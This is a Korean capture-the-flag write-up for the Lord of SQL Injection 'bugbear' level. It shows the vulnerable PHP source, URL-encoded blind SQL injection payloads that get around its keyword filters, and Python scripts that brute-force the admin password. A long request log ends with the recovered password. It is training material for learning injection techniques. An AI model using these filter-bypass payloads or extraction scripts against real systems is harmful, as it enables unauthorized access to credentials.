[Lord Of SQL Injection] 13번

---

query : select id from prob_bugbear where id='guest' and pw='' and no=

---

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
  if(preg_match('/\'|substr|ascii|=|or|and| |like|0x/i', $_GET[no])) exit("HeHe"); 
  $query = "select id from prob_bugbear where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_bugbear where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("bugbear"); 
  highlight_file(__FILE__); 
?>

---

12번 문제에서 추가적으로 or, and, like, 0x도 필터링 기능이 추가되었다.

"?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,"+str(i)+"),1)%09in(%22"+str(j)+"%22)%23"
#?no="" || id in("admin") && right(left(pw,1),1) in("5")#

그래서 추가적으로 변경이 필요했다.

|| -> %7C%7C

like -> in("")

&& -> %26%26

 

패스워드 길이 알아내기

import requests
import string

url = "https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php"
cookie = dict(PHPSESSID="쿠키값")

for i in range(1,100):
    param = "?no=%22%22||%09length(pw)in(%22"+str(i)+"%22)%23"
    len_result = url+param
    response = requests.get(len_result, cookies=cookie)

    if response.text.find("Hello admin")>0:
        print("password :"+str(i))
        break

 

패스워드 알아내기

import requests
import string

url = "https://los.rubiya.kr/chall/bugbear_19ebf8c8106a5323825b5dfa1b07ac1f.php"
cookie = dict(PHPSESSID="쿠키값")

asc = string.digits+string.ascii_letters
result=""

for i in range(1,9):
    for j in asc:
        param = "?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,"+str(i)+"),1)%09in(%22"+str(j)+"%22)%23"
        print(param)
        res_url = url+param
        response = requests.get(res_url, cookies=cookie)

        if response.text.find("Hello admin")>0:
            print(str(i)+"번째 패스워드 :"+j)
            result+=j
            break
print("pw :"+result)

 

?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,1),1)%09in(%220%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,1),1)%09in(%221%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,1),1)%09in(%222%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,1),1)%09in(%223%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,1),1)%09in(%224%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,1),1)%09in(%225%22)%23
1번째 패스워드 :5
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,2),1)%09in(%220%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,2),1)%09in(%221%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,2),1)%09in(%222%22)%23
2번째 패스워드 :2
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%220%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%221%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%222%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%223%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%224%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%225%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%226%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%227%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%228%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%229%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%22a%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%22b%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%22c%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,3),1)%09in(%22d%22)%23
3번째 패스워드 :d
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%220%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%221%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%222%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%223%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%224%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%225%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%226%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%227%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%228%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%229%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%22a%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%22b%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,4),1)%09in(%22c%22)%23
4번째 패스워드 :c
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,5),1)%09in(%220%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,5),1)%09in(%221%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,5),1)%09in(%222%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,5),1)%09in(%223%22)%23
5번째 패스워드 :3
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%220%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%221%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%222%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%223%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%224%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%225%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%226%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%227%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%228%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,6),1)%09in(%229%22)%23
6번째 패스워드 :9
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%220%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%221%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%222%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%223%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%224%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%225%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%226%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%227%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%228%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,7),1)%09in(%229%22)%23
7번째 패스워드 :9
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,8),1)%09in(%220%22)%23
?no=%22%22%09%7C%7C%09id%09in(%22admin%22)%09%26%26%09right(left(pw,8),1)%09in(%221%22)%23
8번째 패스워드 :1
pw :52dc3991